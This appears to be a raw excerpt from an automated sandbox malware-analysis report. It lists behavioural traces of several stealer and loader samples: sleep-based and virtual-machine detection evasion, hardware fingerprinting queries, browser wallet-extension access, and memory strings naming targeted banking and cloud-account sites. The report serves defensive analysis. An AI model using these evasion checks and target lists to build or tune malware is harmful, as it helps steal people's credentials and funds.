                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 1133Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 463Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 1020Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWindow / User API: threadDelayed 1070
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWindow / User API: threadDelayed 5170
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeWindow / User API: threadDelayed 9655
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWindow / User API: threadDelayed 4642
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow / User API: threadDelayed 8403
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.8 %
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5580Thread sleep time: -46023s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5712Thread sleep count: 1133 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5712Thread sleep time: -2267133s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4424Thread sleep count: 463 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4424Thread sleep time: -13890000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6972Thread sleep count: 1020 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6972Thread sleep time: -2041020s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe TID: 7056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe TID: 5060Thread sleep time: -17524406870024063s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe TID: 344Thread sleep count: 1070 > 30
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe TID: 344Thread sleep count: 5170 > 30
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe TID: 7140Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 6716Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 4952Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 5516Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe TID: 7452Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 7688Thread sleep count: 9655 > 30
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 7688Thread sleep time: -289650000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 7724Thread sleep time: -360000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe TID: 5884Thread sleep time: -16602069666338586s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe TID: 6392Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exe TID: 1172Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe TID: 3848Thread sleep count: 220 > 30
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe TID: 3848Thread sleep time: -2200000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe TID: 6704Thread sleep time: -240000s >= -30000s
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe TID: 5988Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe TID: 7016Thread sleep time: -41505174165846465s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe TID: 7452Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe TID: 7452Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00ABF79D FindFirstFileExW,4_2_00ABF79D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B6EA FindFirstFileExW,5_2_0041B6EA
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C394E75 FindFirstFileExW,18_2_6C394E75
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeThread delayed: delay time: 60000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: espartu.exe, 00000021.00000002.4375632738.0000000000BBC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SbieDll.dllzoopoimmwwgyfchdhjubqggfxglcttjmdoptvjvvxyfgytdolchycbyhqmroottsvmtoolsd.dllcmdvrt32.dllHarry JohnsonAdministrator|
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.0000000000981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.00000000027FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                                Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000093C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP[
                                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                                Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: axplong.exe, axplong.exe, 00000003.00000002.2077599379.0000000000BAF000.00000040.00000001.01000000.00000007.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4135928351.00000000013FF000.00000040.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4454387581.000000000064F000.00000040.00000001.01000000.00000020.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: espartu.exe, 00000020.00000002.3903534638.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllM
                                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                Source: ZharkBOT.exe, 0000001D.00000002.3903897986.00000000008D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`N
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,]q
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                Source: espartu.exe, 00000027.00000002.4074861914.00000000008DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SbieDll.dllzoopoimmwwgyfchdhjubqggfxglcttjmdoptvjvvxyfgytdolchycbyhqmroottsvmtoolsd.dllcmdvrt32.dllHarry JohnsonAdministrator
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SbieDll.dllzoopoimC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exevmtoolsd.dllcmdvrt32.dllHarry JohnsonAdministrator
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2247050964.0000000006643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                                Source: mlk3kK6uLZ.exe, 00000000.00000002.2042929479.000000000029F000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2077599379.0000000000BAF000.00000040.00000001.01000000.00000007.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4135928351.00000000013FF000.00000040.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4454387581.000000000064F000.00000040.00000001.01000000.00000020.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: Amcache.hve.8.drBinary or memory string: VMware
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: Freshbuild.exe, 00000016.00000003.2788834990.000000000110A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\]q
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015C0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3724002684.000001AA92254000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103315293.0000027EC0EC1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2727217159.000001662821E000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2726801236.00000166281AC000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000003.2725143849.000001662821E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: ZharkBOT.exe, 0000001D.00000002.3902836498.00000000003B9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ;0SbieDll.dllzoopoimmwwgyfchdhjubqggfxglcttjmdoptvjvvxyfgytdolchycbyhqmroottsvmtoolsd.dllcmdvrt32.dllHarry JohnsonAdministrator|
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: espartu.exe, 00000027.00000002.4074861914.00000000008DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dll
                                Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware_
                                Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: build16666.exe, 00000015.00000002.2727217159.000001662821E000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000003.2725143849.000001662821E000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000003.2724419928.000001662821E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                                Source: svchost.exe, 0000000C.00000002.3723322597.000001AA8CA2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp{%
                                Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
